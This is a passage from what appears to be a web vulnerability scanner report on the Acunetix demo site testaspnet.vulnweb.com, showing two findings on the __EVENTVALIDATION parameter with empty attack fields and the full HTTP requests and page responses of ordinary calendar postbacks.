</HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8563&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAJffXatsIZGRk8y%2BbE%2Fcd5P3mD92nhNwRONE1Tk8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKopq%2BJDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMQhoxKjfzLIJY%2Bk55KKPs88pjvtA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:10 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAJffXatsIZGRk8y+bE/cd5P3mD92nhNwRONE1Tk8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKopq+JDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMQhoxKjfzLIJY+k55KKPs88pjvtA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:White" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8559&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAfk2zZ9sIZGRkJHSM33drFohN1OXlY0ejMULTbP8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKot9rABAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMM5g4yblcBCXUEEwaWhVN%2BG5iMrU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:31 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAfk2zZ9sIZGRkJHSM33drFohN1OXlY0ejMULTbP8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKot9rABAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMM5g4yblcBCXUEEwaWhVN+G5iMrU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:White" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to 